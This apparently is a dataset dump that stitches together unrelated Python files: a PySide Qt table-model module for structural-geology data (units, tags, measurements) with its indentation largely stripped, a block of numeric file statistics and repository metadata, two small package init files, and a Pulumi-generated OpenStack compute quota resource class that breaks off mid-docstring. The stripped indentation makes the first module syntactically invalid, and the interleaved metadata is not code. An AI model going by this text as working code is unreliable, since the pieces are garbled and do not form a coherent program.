# Cache the passed data list as a class member.
self._items = mlist
# Create lookup dictionaries
self.updateIndex()
def updateIndex(self):
""" Update lookup dictionaries for id and row. """
self.id2row = {}
self.row2id = {}
for idx,row in enumerate(self._items):
self.id2row[row[0]] = idx
self.row2id[idx] = row[0]
def rowCount(self, index=QtCore.QModelIndex()):
""" Returns the number of rows the model holds. """
return len(self._items)
def columnCount(self, index=QtCore.QModelIndex()):
""" Returns the number of columns the model holds. """
return len(structurecol)
def data(self, index, role = QtCore.Qt.DisplayRole):
""" Depending on the index and role given, return data. If not
returning data, return None (PySide equivalent of QT's
"invalid QVariant").
"""
if not index.isValid():
return None
if not 0 <= index.row() < len(self._items):
return None
if role == QtCore.Qt.DisplayRole:
# The view is asking for the actual data, so, just return the item it's asking for.
return self._items[index.row()][index.column()]
else:
# We don't care about anything else, so make sure to return None.
return None
def getRow(self, index):
""" Returns model row. """
return self._items[index.row()]
def updateRow(self, index, datarow):
""" Updates model row. """
self._items[index.row()] = datarow
self.dataChanged.emit(index, index)
# self.emit(QtCore.SIGNAL('dataChanged(QModelIndex,QModelIndex)'), index, index)
def appendRow(self, datarow, index=None, offset=0):
""" Append model row. """
if index is None:
pos = len(self._items)
else:
pos = index.row() + offset
self.beginInsertRows(QtCore.QModelIndex(), pos, pos)
self._items.insert(pos, datarow)
self.endInsertRows()
self.updateIndex()
def removeRow(self, index):
""" Remove model row. """
self.beginRemoveRows(QtCore.QModelIndex(), index.row(), index.row())
del self._items[index.row()]
self.endRemoveRows()
self.updateIndex()
def isplanar(self, row):
return self._items[row][structurecol['planar']] == 1
class UnitModel(QtCore.QAbstractTableModel):
# Here we define model to store units table data
def __init__(self, mlist, parent=None):
super(UnitModel, self).__init__(parent)
# Cache the passed data list as a class member.
self._items = mlist
# Create lookup dictionaries
self.updateIndex()
def updateIndex(self):
""" Update lookup dictionaries for id and row. """
self.id2row = {}
self.row2id = {}
for idx,row in enumerate(self._items):
self.id2row[row[0]] = idx
self.row2id[idx] = row[0]
def rowCount(self, index=QtCore.QModelIndex()):
""" Returns the number of rows the model holds. """
return len(self._items)
def columnCount(self, index=QtCore.QModelIndex()):
""" Returns the number of columns the model holds. """
return len(unitcol)
def data(self, index, role = QtCore.Qt.DisplayRole):
""" Depending on the index and role given, return data. If not
returning data, return None (PySide equivalent of QT's
"invalid QVariant").
"""
if not index.isValid():
return None
if not 0 <= index.row() < len(self._items):
return None
if role == QtCore.Qt.DisplayRole:
# The view is asking for the actual data, so, just return the item it's asking for.
return self._items[index.row()][index.column()]
else:
# We don't care about anything else, so make sure to return None.
return None
def getRow(self, index):
""" Returns model row. """
return self._items[index.row()]
def updateRow(self, index, datarow):
""" Updates model row. """
self._items[index.row()] = datarow
self.dataChanged.emit(index, index)
# self.emit(QtCore.SIGNAL('dataChanged(QModelIndex,QModelIndex)'), index, index)
def appendRow(self, datarow, index=None, offset=0):
""" Append model row. """
if index is None:
pos = len(self._items)
else:
pos = index.row() + offset
self.beginInsertRows(QtCore.QModelIndex(), pos, pos)
self._items.insert(pos, datarow)
self.endInsertRows()
self.updateIndex()
def removeRow(self, index):
""" Remove model row. """
self.beginRemoveRows(QtCore.QModelIndex(), index.row(), index.row())
del self._items[index.row()]
self.endRemoveRows()
self.updateIndex()
class TagModel(QtCore.QAbstractTableModel):
# Here we define model to store tags table data
def __init__(self, mlist, parent=None):
super(TagModel, self).__init__(parent)
# Cache the passed data list as a class member.
self._items = mlist
# Create lookup dictionaries
self.updateIndex()
def updateIndex(self):
""" Update lookup dictionaries for id and row. """
self.id2row = {}
self.row2id = {}
for idx,row in enumerate(self._items):
self.id2row[row[0]] = idx
self.row2id[idx] = row[0]
def rowCount(self, index=QtCore.QModelIndex()):
""" Returns the number of rows the model holds. """
return len(self._items)
def columnCount(self, index=QtCore.QModelIndex()):
""" Returns the number of columns the model holds. """
return len(tagcol)
def data(self, index, role = QtCore.Qt.DisplayRole):
""" Depending on the index and role given, return data. If not
returning data, return None (PySide equivalent of QT's
"invalid QVariant").
"""
if not index.isValid():
return None
if not 0 <= index.row() < len(self._items):
return None
if role == QtCore.Qt.CheckStateRole and index.column() == tagcol['check']:
# The view is asking for the actual state of checkable item.
return self._items[index.row()][index.column()]
elif role == QtCore.Qt.FontRole and index.column() == tagcol['check']:
# The view is asking for the font properties.
font = QtGui.QFont()
if self._items[index.row()][index.column()] == QtCore.Qt.Checked:
font.setBold(True)
else:
font.setBold(False)
return font
elif role == QtCore.Qt.DisplayRole:
# The view is asking for the actual data, so, just return the item it's asking for.
if index.column() == tagcol['check']:
return self._items[index.row()][tagcol['name']]
else:
return self._items[index.row()][index.column()]
else:
# We don't care about anything else, so make sure to return None.
return None
def flags(self, index):
if not index.isValid():
return QtCore.Qt.NoItemFlags
if index.column() == tagcol['check']:
return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsUserCheckable | QtCore.Qt.ItemIsSelectable
else:
return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable
def setData(self, index, value, role):
if index.isValid() and role == QtCore.Qt.CheckStateRole:
if index.column() == tagcol['check']:
self._items[index.row()][index.column()] = value
self.dataChanged.emit(index, index)
return True
return False
def getChecked(self):
return [row[tagcol['id']] for row in self._items if row[tagcol['check']] == QtCore.Qt.Checked]
def cleanState(self):
for row in self._items:
row[tagcol['check']] = QtCore.Qt.Unchecked
def setState(self, ids):
for row in self._items:
if row[tagcol['id']] in ids:
row[tagcol['check']] = QtCore.Qt.Checked
else:
row[tagcol['check']] = QtCore.Qt.Unchecked
def getRow(self, index):
""" Returns model row. """
return self._items[index.row()]
def updateRow(self, index, datarow):
""" Updates model row. """
self._items[index.row()] = datarow
self.dataChanged.emit(index, index)
# self.emit(QtCore.SIGNAL('dataChanged(QModelIndex,QModelIndex)'), index, index)
def appendRow(self, datarow, index=None, offset=0):
""" Append model row. """
if index is None:
pos = len(self._items)
else:
pos = index.row() + offset
self.beginInsertRows(QtCore.QModelIndex(), pos, pos)
self._items.insert(pos, datarow)
self.endInsertRows()
self.updateIndex()
def removeRow(self, index):
""" Remove model row. """
self.beginRemoveRows(QtCore.QModelIndex(), index.row(), index.row())
del self._items[index.row()]
self.endRemoveRows()
self.updateIndex()
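# Usage sketch for the checkable column: each row is [id, name, desc, check],
# mirroring tagcol, with 'check' holding a Qt check-state constant.
#
#   tags = TagModel([[1, 'fault', '', QtCore.Qt.Unchecked],
#                    [2, 'fold', '', QtCore.Qt.Unchecked]])
#   tags.setState([2])                 # tick the tag with id 2
#   assert tags.getChecked() == [2]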
class DataModel(QtCore.QAbstractTableModel):
# Here we define model to store data table
def __init__(self, mlist, parent=None):
super(DataModel, self).__init__(parent)
# Cache the passed data list as a class member.
self._items = mlist
# Create lookup dictionaries
self.updateIndex()
def updateIndex(self):
""" Update lookup dictionaries for id and row. """
self.id2row = {}
self.row2id = {}
for idx,row in enumerate(self._items):
self.id2row[row[0]] = idx
self.row2id[idx] = row[0]
def rowCount(self, index=QtCore.QModelIndex()):
""" Returns the number of rows the model holds. """
return len(self._items)
def columnCount(self, index=QtCore.QModelIndex()):
""" Returns the number of columns the model holds. """
return len(datacol)
    def data(self, index, role=QtCore.Qt.DisplayRole):
        """ Depending on the index and role given, return data. If not
            returning data, return None (the PySide equivalent of Qt's
            "invalid QVariant").
        """
if not index.isValid():
return None
if not 0 <= index.row() < len(self._items):
return None
        if role == QtCore.Qt.DisplayRole:
            # The view is asking for the actual data, so return the requested item.
            return self._items[index.row()][index.column()]
        elif role == QtCore.Qt.ToolTipRole:
            # The view is asking for tooltip data, so return the description.
            return self._items[index.row()][datacol['desc']]
        else:
            # We don't care about any other role, so return None.
            return None
def getRow(self, index):
""" Returns model row. """
return self._items[index.row()]
def headerData(self, section, orientation, role=QtCore.Qt.DisplayRole):
""" Set the headers to be displayed. """
if role != QtCore.Qt.DisplayRole:
return None
if orientation == QtCore.Qt.Horizontal:
if section == datacol['azi']:
return "Azimuth"
elif section == datacol['inc']:
return "Inclination"
elif section == datacol['struct']:
return "Structure"
elif section == datacol['tags']:
return "Tags"
else:
return None
return None
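A minimal wiring sketch for `DataModel` (PySide assumed, matching the QtCore/QtGui usage above). The `datacol` layout is defined elsewhere in the module, so the sample row below is hypothetical:

```python
import sys
from PySide import QtCore, QtGui

# Hypothetical row layout: [id, azimuth, inclination, structure, tags, description].
rows = [[1, 120.0, 45.0, 'bedding', '', 'example measurement']]

app = QtGui.QApplication(sys.argv)
model = DataModel(rows)          # DataModel is defined above
view = QtGui.QTableView()
view.setModel(model)             # column headers come from DataModel.headerData()
view.show()
sys.exit(app.exec_())
```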
| 38.203501
| 251
| 0.608511
| 2,143
| 17,459
| 4.903873
| 0.10406
| 0.048815
| 0.031973
| 0.038824
| 0.834332
| 0.815396
| 0.780474
| 0.754306
| 0.710058
| 0.679513
| 0
| 0.009195
| 0.277393
| 17,459
| 456
| 252
| 38.287281
| 0.823795
| 0.208775
| 0
| 0.712803
| 0
| 0.034602
| 0.167015
| 0.001793
| 0
| 0
| 0
| 0
| 0
| 1
| 0.17301
| false
| 0
| 0.00346
| 0.00692
| 0.391003
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1bf0bd8bf3c87a5edfb5b1684a667168ee2faddf
| 83
|
py
|
Python
|
cemba_data/dmr/dss/__init__.py
|
jksr/cemba_data
|
c796c33a2fd262b2ef893df1951a90b8d0ba9289
|
[
"MIT"
] | 4
|
2018-11-13T21:50:57.000Z
|
2020-11-25T18:42:57.000Z
|
cemba_data/dmr/dss/__init__.py
|
jksr/cemba_data
|
c796c33a2fd262b2ef893df1951a90b8d0ba9289
|
[
"MIT"
] | 9
|
2020-10-25T01:58:07.000Z
|
2021-06-13T19:17:50.000Z
|
cemba_data/dmr/dss/__init__.py
|
jksr/cemba_data
|
c796c33a2fd262b2ef893df1951a90b8d0ba9289
|
[
"MIT"
] | 3
|
2018-12-29T23:30:25.000Z
|
2020-10-14T18:00:03.000Z
|
from .TwoGroup import run_dss_two_group
from .MultiGroup import run_dss_multi_group
| 41.5
| 43
| 0.891566
| 14
| 83
| 4.857143
| 0.642857
| 0.264706
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084337
| 83
| 2
| 43
| 41.5
| 0.894737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4015ac3760416ee352775e59bc9e4946232e04da
| 148
|
py
|
Python
|
sprint/tools_fa/__init__.py
|
jumphone/sprint
|
94a5e5450d73b357497fba11eef818c6cc8792aa
|
[
"MIT"
] | 44
|
2018-03-09T22:22:50.000Z
|
2021-09-15T09:40:54.000Z
|
sprint/tools_fa/__init__.py
|
jumphone/sprint
|
94a5e5450d73b357497fba11eef818c6cc8792aa
|
[
"MIT"
] | 30
|
2018-03-19T05:30:05.000Z
|
2022-01-21T06:54:45.000Z
|
sprint/tools_fa/__init__.py
|
jumphone/sprint
|
94a5e5450d73b357497fba11eef818c6cc8792aa
|
[
"MIT"
] | 13
|
2018-06-30T10:07:02.000Z
|
2021-06-10T13:25:43.000Z
|
from maskAwithG import *
from maskTwithC import *
from transcript_assembler import *
from transcript_locator import *
from transcript_sort import *
| 24.666667
| 34
| 0.831081
| 18
| 148
| 6.666667
| 0.444444
| 0.333333
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.135135
| 148
| 5
| 35
| 29.6
| 0.9375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4025fb0f7a6e66b339f48e7130243a1c13b28517
| 43,803
|
py
|
Python
|
sdk/python/pulumi_openstack/compute/quota_set_v2.py
|
pulumi/pulumi-openstack
|
945eed22a82784e9f0b3aa56168b2397c2f503e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 34
|
2018-09-12T12:37:51.000Z
|
2022-02-04T19:32:13.000Z
|
sdk/python/pulumi_openstack/compute/quota_set_v2.py
|
pulumi/pulumi-openstack
|
945eed22a82784e9f0b3aa56168b2397c2f503e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 72
|
2018-08-15T13:04:57.000Z
|
2022-03-31T15:39:49.000Z
|
sdk/python/pulumi_openstack/compute/quota_set_v2.py
|
pulumi/pulumi-openstack
|
945eed22a82784e9f0b3aa56168b2397c2f503e8
|
[
"ECL-2.0",
"Apache-2.0"
] | 7
|
2019-03-14T08:28:49.000Z
|
2021-12-29T04:23:55.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['QuotaSetV2Args', 'QuotaSetV2']
@pulumi.input_type
class QuotaSetV2Args:
def __init__(__self__, *,
project_id: pulumi.Input[str],
cores: Optional[pulumi.Input[int]] = None,
fixed_ips: Optional[pulumi.Input[int]] = None,
floating_ips: Optional[pulumi.Input[int]] = None,
injected_file_content_bytes: Optional[pulumi.Input[int]] = None,
injected_file_path_bytes: Optional[pulumi.Input[int]] = None,
injected_files: Optional[pulumi.Input[int]] = None,
instances: Optional[pulumi.Input[int]] = None,
key_pairs: Optional[pulumi.Input[int]] = None,
metadata_items: Optional[pulumi.Input[int]] = None,
ram: Optional[pulumi.Input[int]] = None,
region: Optional[pulumi.Input[str]] = None,
security_group_rules: Optional[pulumi.Input[int]] = None,
security_groups: Optional[pulumi.Input[int]] = None,
server_group_members: Optional[pulumi.Input[int]] = None,
server_groups: Optional[pulumi.Input[int]] = None):
"""
The set of arguments for constructing a QuotaSetV2 resource.
:param pulumi.Input[str] project_id: ID of the project to manage quotas.
Changing this creates a new quotaset.
:param pulumi.Input[int] cores: Quota value for cores.
Changing this updates the existing quotaset.
:param pulumi.Input[int] fixed_ips: Quota value for fixed IPs.
Changing this updates the existing quotaset.
:param pulumi.Input[int] floating_ips: Quota value for floating IPs.
Changing this updates the existing quotaset.
:param pulumi.Input[int] injected_file_content_bytes: Quota value for content bytes
of injected files. Changing this updates the existing quotaset.
:param pulumi.Input[int] injected_file_path_bytes: Quota value for path bytes of
injected files. Changing this updates the existing quotaset.
:param pulumi.Input[int] injected_files: Quota value for injected files.
Changing this updates the existing quotaset.
:param pulumi.Input[int] instances: Quota value for instances.
Changing this updates the existing quotaset.
:param pulumi.Input[int] key_pairs: Quota value for key pairs.
Changing this updates the existing quotaset.
:param pulumi.Input[int] metadata_items: Quota value for metadata items.
Changing this updates the existing quotaset.
:param pulumi.Input[int] ram: Quota value for RAM.
Changing this updates the existing quotaset.
        :param pulumi.Input[str] region: The region in which to create the quotaset. If
omitted, the `region` argument of the provider is used. Changing this
creates a new quotaset.
:param pulumi.Input[int] security_group_rules: Quota value for security group rules.
Changing this updates the existing quotaset.
:param pulumi.Input[int] security_groups: Quota value for security groups.
Changing this updates the existing quotaset.
        :param pulumi.Input[int] server_group_members: Quota value for server group members.
Changing this updates the existing quotaset.
:param pulumi.Input[int] server_groups: Quota value for server groups.
Changing this updates the existing quotaset.
"""
pulumi.set(__self__, "project_id", project_id)
if cores is not None:
pulumi.set(__self__, "cores", cores)
if fixed_ips is not None:
pulumi.set(__self__, "fixed_ips", fixed_ips)
if floating_ips is not None:
pulumi.set(__self__, "floating_ips", floating_ips)
if injected_file_content_bytes is not None:
pulumi.set(__self__, "injected_file_content_bytes", injected_file_content_bytes)
if injected_file_path_bytes is not None:
pulumi.set(__self__, "injected_file_path_bytes", injected_file_path_bytes)
if injected_files is not None:
pulumi.set(__self__, "injected_files", injected_files)
if instances is not None:
pulumi.set(__self__, "instances", instances)
if key_pairs is not None:
pulumi.set(__self__, "key_pairs", key_pairs)
if metadata_items is not None:
pulumi.set(__self__, "metadata_items", metadata_items)
if ram is not None:
pulumi.set(__self__, "ram", ram)
if region is not None:
pulumi.set(__self__, "region", region)
if security_group_rules is not None:
pulumi.set(__self__, "security_group_rules", security_group_rules)
if security_groups is not None:
pulumi.set(__self__, "security_groups", security_groups)
if server_group_members is not None:
pulumi.set(__self__, "server_group_members", server_group_members)
if server_groups is not None:
pulumi.set(__self__, "server_groups", server_groups)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Input[str]:
"""
ID of the project to manage quotas.
Changing this creates a new quotaset.
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: pulumi.Input[str]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter
def cores(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for cores.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "cores")
@cores.setter
def cores(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cores", value)
@property
@pulumi.getter(name="fixedIps")
def fixed_ips(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for fixed IPs.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "fixed_ips")
@fixed_ips.setter
def fixed_ips(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "fixed_ips", value)
@property
@pulumi.getter(name="floatingIps")
def floating_ips(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for floating IPs.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "floating_ips")
@floating_ips.setter
def floating_ips(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "floating_ips", value)
@property
@pulumi.getter(name="injectedFileContentBytes")
def injected_file_content_bytes(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for content bytes
of injected files. Changing this updates the existing quotaset.
"""
return pulumi.get(self, "injected_file_content_bytes")
@injected_file_content_bytes.setter
def injected_file_content_bytes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "injected_file_content_bytes", value)
@property
@pulumi.getter(name="injectedFilePathBytes")
def injected_file_path_bytes(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for path bytes of
injected files. Changing this updates the existing quotaset.
"""
return pulumi.get(self, "injected_file_path_bytes")
@injected_file_path_bytes.setter
def injected_file_path_bytes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "injected_file_path_bytes", value)
@property
@pulumi.getter(name="injectedFiles")
def injected_files(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for injected files.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "injected_files")
@injected_files.setter
def injected_files(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "injected_files", value)
@property
@pulumi.getter
def instances(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for instances.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "instances")
@instances.setter
def instances(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "instances", value)
@property
@pulumi.getter(name="keyPairs")
def key_pairs(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for key pairs.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "key_pairs")
@key_pairs.setter
def key_pairs(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "key_pairs", value)
@property
@pulumi.getter(name="metadataItems")
def metadata_items(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for metadata items.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "metadata_items")
@metadata_items.setter
def metadata_items(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "metadata_items", value)
@property
@pulumi.getter
def ram(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for RAM.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "ram")
@ram.setter
def ram(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "ram", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
        The region in which to create the quotaset. If
omitted, the `region` argument of the provider is used. Changing this
creates a new quotaset.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter(name="securityGroupRules")
def security_group_rules(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for security group rules.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "security_group_rules")
@security_group_rules.setter
def security_group_rules(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "security_group_rules", value)
@property
@pulumi.getter(name="securityGroups")
def security_groups(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for security groups.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "security_groups")
@security_groups.setter
def security_groups(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "security_groups", value)
@property
@pulumi.getter(name="serverGroupMembers")
def server_group_members(self) -> Optional[pulumi.Input[int]]:
"""
        Quota value for server group members.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "server_group_members")
@server_group_members.setter
def server_group_members(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "server_group_members", value)
@property
@pulumi.getter(name="serverGroups")
def server_groups(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for server groups.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "server_groups")
@server_groups.setter
def server_groups(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "server_groups", value)
@pulumi.input_type
class _QuotaSetV2State:
def __init__(__self__, *,
cores: Optional[pulumi.Input[int]] = None,
fixed_ips: Optional[pulumi.Input[int]] = None,
floating_ips: Optional[pulumi.Input[int]] = None,
injected_file_content_bytes: Optional[pulumi.Input[int]] = None,
injected_file_path_bytes: Optional[pulumi.Input[int]] = None,
injected_files: Optional[pulumi.Input[int]] = None,
instances: Optional[pulumi.Input[int]] = None,
key_pairs: Optional[pulumi.Input[int]] = None,
metadata_items: Optional[pulumi.Input[int]] = None,
project_id: Optional[pulumi.Input[str]] = None,
ram: Optional[pulumi.Input[int]] = None,
region: Optional[pulumi.Input[str]] = None,
security_group_rules: Optional[pulumi.Input[int]] = None,
security_groups: Optional[pulumi.Input[int]] = None,
server_group_members: Optional[pulumi.Input[int]] = None,
server_groups: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering QuotaSetV2 resources.
:param pulumi.Input[int] cores: Quota value for cores.
Changing this updates the existing quotaset.
:param pulumi.Input[int] fixed_ips: Quota value for fixed IPs.
Changing this updates the existing quotaset.
:param pulumi.Input[int] floating_ips: Quota value for floating IPs.
Changing this updates the existing quotaset.
:param pulumi.Input[int] injected_file_content_bytes: Quota value for content bytes
of injected files. Changing this updates the existing quotaset.
:param pulumi.Input[int] injected_file_path_bytes: Quota value for path bytes of
injected files. Changing this updates the existing quotaset.
:param pulumi.Input[int] injected_files: Quota value for injected files.
Changing this updates the existing quotaset.
:param pulumi.Input[int] instances: Quota value for instances.
Changing this updates the existing quotaset.
:param pulumi.Input[int] key_pairs: Quota value for key pairs.
Changing this updates the existing quotaset.
:param pulumi.Input[int] metadata_items: Quota value for metadata items.
Changing this updates the existing quotaset.
:param pulumi.Input[str] project_id: ID of the project to manage quotas.
Changing this creates a new quotaset.
:param pulumi.Input[int] ram: Quota value for RAM.
Changing this updates the existing quotaset.
        :param pulumi.Input[str] region: The region in which to create the quotaset. If
omitted, the `region` argument of the provider is used. Changing this
creates a new quotaset.
:param pulumi.Input[int] security_group_rules: Quota value for security group rules.
Changing this updates the existing quotaset.
:param pulumi.Input[int] security_groups: Quota value for security groups.
Changing this updates the existing quotaset.
        :param pulumi.Input[int] server_group_members: Quota value for server group members.
Changing this updates the existing quotaset.
:param pulumi.Input[int] server_groups: Quota value for server groups.
Changing this updates the existing quotaset.
"""
if cores is not None:
pulumi.set(__self__, "cores", cores)
if fixed_ips is not None:
pulumi.set(__self__, "fixed_ips", fixed_ips)
if floating_ips is not None:
pulumi.set(__self__, "floating_ips", floating_ips)
if injected_file_content_bytes is not None:
pulumi.set(__self__, "injected_file_content_bytes", injected_file_content_bytes)
if injected_file_path_bytes is not None:
pulumi.set(__self__, "injected_file_path_bytes", injected_file_path_bytes)
if injected_files is not None:
pulumi.set(__self__, "injected_files", injected_files)
if instances is not None:
pulumi.set(__self__, "instances", instances)
if key_pairs is not None:
pulumi.set(__self__, "key_pairs", key_pairs)
if metadata_items is not None:
pulumi.set(__self__, "metadata_items", metadata_items)
if project_id is not None:
pulumi.set(__self__, "project_id", project_id)
if ram is not None:
pulumi.set(__self__, "ram", ram)
if region is not None:
pulumi.set(__self__, "region", region)
if security_group_rules is not None:
pulumi.set(__self__, "security_group_rules", security_group_rules)
if security_groups is not None:
pulumi.set(__self__, "security_groups", security_groups)
if server_group_members is not None:
pulumi.set(__self__, "server_group_members", server_group_members)
if server_groups is not None:
pulumi.set(__self__, "server_groups", server_groups)
@property
@pulumi.getter
def cores(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for cores.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "cores")
@cores.setter
def cores(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "cores", value)
@property
@pulumi.getter(name="fixedIps")
def fixed_ips(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for fixed IPs.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "fixed_ips")
@fixed_ips.setter
def fixed_ips(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "fixed_ips", value)
@property
@pulumi.getter(name="floatingIps")
def floating_ips(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for floating IPs.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "floating_ips")
@floating_ips.setter
def floating_ips(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "floating_ips", value)
@property
@pulumi.getter(name="injectedFileContentBytes")
def injected_file_content_bytes(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for content bytes
of injected files. Changing this updates the existing quotaset.
"""
return pulumi.get(self, "injected_file_content_bytes")
@injected_file_content_bytes.setter
def injected_file_content_bytes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "injected_file_content_bytes", value)
@property
@pulumi.getter(name="injectedFilePathBytes")
def injected_file_path_bytes(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for path bytes of
injected files. Changing this updates the existing quotaset.
"""
return pulumi.get(self, "injected_file_path_bytes")
@injected_file_path_bytes.setter
def injected_file_path_bytes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "injected_file_path_bytes", value)
@property
@pulumi.getter(name="injectedFiles")
def injected_files(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for injected files.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "injected_files")
@injected_files.setter
def injected_files(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "injected_files", value)
@property
@pulumi.getter
def instances(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for instances.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "instances")
@instances.setter
def instances(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "instances", value)
@property
@pulumi.getter(name="keyPairs")
def key_pairs(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for key pairs.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "key_pairs")
@key_pairs.setter
def key_pairs(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "key_pairs", value)
@property
@pulumi.getter(name="metadataItems")
def metadata_items(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for metadata items.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "metadata_items")
@metadata_items.setter
def metadata_items(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "metadata_items", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> Optional[pulumi.Input[str]]:
"""
ID of the project to manage quotas.
Changing this creates a new quotaset.
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter
def ram(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for RAM.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "ram")
@ram.setter
def ram(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "ram", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
        The region in which to create the quotaset. If
omitted, the `region` argument of the provider is used. Changing this
creates a new quotaset.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter(name="securityGroupRules")
def security_group_rules(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for security group rules.
Changing this updates the existing quotaset.
"""
return pulumi.get(self, "security_group_rules")
@security_group_rules.setter
def security_group_rules(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "security_group_rules", value)
@property
@pulumi.getter(name="securityGroups")
def security_groups(self) -> Optional[pulumi.Input[int]]:
"""
Quota value for security groups.
